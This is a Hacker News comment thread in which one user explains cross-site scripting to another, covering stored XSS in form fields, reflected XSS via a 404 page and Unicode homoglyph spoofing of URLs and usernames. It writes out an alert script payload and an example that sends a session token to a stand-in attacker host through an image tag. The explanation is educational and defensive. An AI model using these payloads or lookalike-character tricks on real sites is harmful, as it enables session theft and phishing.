Hacker News new | ask | show | jobs
by jamiesonbecker 3387 days ago
Your humility is pretty awesome.

As a simple example, paste <script>alert("haha")</script> into an form in your system that will (eventually) be viewable to someone else. Let's say it's something innocuous like the quantity field on an order form or a comment on a comment form.

Now, none of those characters will attack your database through SQL injection, right? So what happens when you (the administrator) views your latest orders? Basically, that javascript is now operating in the security context of you, the administrator, not in the context of the attacker that submitted it. It could do something worse than alert()... for example, it could grab your session token or a cookie's secret value (depending on the cookie) and send it off to <img src=evilattacker.xyz/clear.gif?sid=xxxx>, and now the attacker can become you.

Or, it could do the same thing to another user on your forum when they look at the evil comment.

This sort of attack is easy to do and broadly considered XSS (cross-site scripting). There are related areas of attack, like cookie forgery, referral, etc attacks. The OWASP string replacement guidelines (or my safify.js) can help with this, but ultimately string sanitation has to make sense for the context (i.e., browser bad characters are different from SQL injection bad characters).

And, you have to think about the weakest link... us poor humans, to whom similar π–»π—Žπ— π—‡π—ˆπ— π—Šπ—Žπ—‚π—π–Ύ 𝗍𝗁𝖾 π—Œπ–Ίπ—†π–Ύ π—Žπ—‡π—‚π–Όπ—ˆπ–½π–Ύ π—…π–Ύπ—π—π–Ύπ—‹π—Œ 𝖼𝖺𝗇 𝖻𝖾 π—Žπ—Œπ–Ύπ–½ π—π—ˆ 𝗍𝗋𝗂𝖼𝗄 π—Œπ—ˆπ—†π–Ύπ—ˆπ—‡π–Ύ... 𝗆𝖺𝗒𝖻𝖾 𝗍𝗁𝖾𝗒 𝗍𝗁𝗂𝗇𝗄 𝗂𝗍'π—Œ 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 𝖴𝖱𝖫 𝗍𝗁𝖺𝗇 𝗂𝗍 π—‚π—Œ, π—ˆπ—‹ 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 π—Žπ—Œπ–Ύπ—‹π—‡π–Ίπ—†π–Ύ.. (paste that into vim to see the actual characters in the preceding sentence.)

    π—π—π—π—‰π—Œ://π—€π—ˆπ—ˆπ—€π—…π–Ύ.π–Όπ—ˆπ—†/?π—Š=π—‡π—ˆπ—+𝗐𝗁𝖺𝗍+π—’π—ˆπ—Ž+𝗍𝗁𝗂𝗇𝗄
None of those unicode characters will usually trigger any blacklists, but because it "looks" right, sometimes can even trick security-aware hackers. (see also punycode). What if someone spoofs someone's username on github?

There's lots and lots of interesting ways to attack websites. It's tough to keep track of them all.

Another example. Your 404 page..

    <h1>404</h1>
    <p>Sorry, /x/y/z doesn't exist.</p>
Now, someone says "Hey, can you please visit this site?"

https://yoursite.com/this-is-a-long-url-thats-hidden-in-a-an...
1 comments
scandox 3387 days ago
Humility is all I've got :)
link